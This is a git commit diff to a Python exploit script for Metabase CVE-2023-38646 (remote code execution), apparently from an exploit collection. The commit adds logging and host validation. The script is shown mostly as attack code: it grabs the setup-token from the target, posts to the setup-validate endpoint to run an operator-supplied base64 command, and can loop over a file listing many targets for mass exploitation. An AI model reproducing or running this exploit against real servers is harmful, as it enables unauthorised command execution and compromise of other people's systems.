update Metabase CVE-2023-38646 RCE add logging func

2023-07-30 23:18:14 +08:00 · 2023-07-30 23:18:14 +08:00 · b9f83c4750
commit b9f83c4750
parent 40c0d772f6
1 changed files with 34 additions and 13 deletions
--- a/93-数据库专区/02-Metabase/CVE-2023-38646/cve-2023-38646.py
+++ b/93-数据库专区/02-Metabase/CVE-2023-38646/cve-2023-38646.py
@ -4,21 +4,35 @@
 import argparse
 import requests
 import base64
+import logging
+
+logging.basicConfig(level=logging.INFO,
+                    format='[%(asctime)s.%(msecs)03d] [%(levelname)s] : %(message)s',
+                    )
+
+
+def check_host(host):
+    if host is None:
+        return False
+    if len(host) > 0:
+        return True
+    else:
+        return False


 def exploit(host, port, cmd, protocol='http://'):
    global setup_token
-    target =protocol+ host + ':' + port
-    print(f'Attacking {target}')
+    target = protocol + host + ':' + port
+    logging.info(f'[+] Attacking {target} ...')
    url = target + '/api/session/properties'
    step_one = requests.get(url, verify=False)
    result = step_one.json()
    try:
        setup_token = result['setup-token']
    except KeyError as e:
-        print("setup-token missed")
+        logging.error("setup-token missed")
        exit(0)
-    print(f'[+] setup-token={setup_token}')
+    logging.debug(f'[+] setup-token={setup_token}')

    check_url = target + '/api/setup/validate'
    response = requests.post(check_url, timeout=3,
@ -44,16 +58,17 @@ def exploit(host, port, cmd, protocol='http://'):
                                 },
                             }
                             )
-    print(f'[+] Server response:\n{response.text}')
+    logging.debug(f'[+] Server response: {response.text}')
+    logging.info(f'[+] Server resp code: {response.status_code}')


 if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='exp for cve-2023-38346')
-    parser.add_argument('--host', help='输入目标ip')
-    parser.add_argument('--file', help='输入包含目标的文件')
-    parser.add_argument('--port', default='3000', help='输入目标端口，默认为 3000')
-    parser.add_argument('--cmd', type=str, required=True, help='输入目标ip')
    parser.add_argument('--protocol', type=str, default='http', help='输入目标协议，http或https')
+    parser.add_argument('--host', help='输入目标ip')
+    parser.add_argument('--port', default='3000', help='输入目标端口，默认为 3000')
+    parser.add_argument('--file', help='输入包含目标的文件')
+    parser.add_argument('--cmd', type=str, required=True, help='输入目标ip')

    args = parser.parse_args()
    protocol = args.protocol
@ -74,6 +89,8 @@ if __name__ == '__main__':
        with open(host_file, 'r') as f:
            for temp_host in f:
                temp_host = temp_host.rstrip('\n')
+                if '://' in temp_host:
+                    protocol = temp_host.split('://')[0] + '://'
                if ':' in temp_host:
                    host = temp_host.split(':')[0]
                    port = temp_host.split(':')[1]
@ -81,14 +98,18 @@ if __name__ == '__main__':
                    host = temp_host
                    port = '3000'
                try:
+                    if check_host(host):
                        exploit(host, port, b64_cmd, protocol)
                except Exception as e:
-                    print(f'Connection error:\n{e}')
+                    print(f'[-] Connection error:\n{e}')
+                    continue
+
    else:
        host = args.host
        port = args.port

        try:
+            if check_host(host):
                exploit(host, port, b64_cmd, protocol)
        except Exception as e:
-            print(f'Connection error:\n{e}')
+            logging.error(f'[-] Connection error:\n{e}')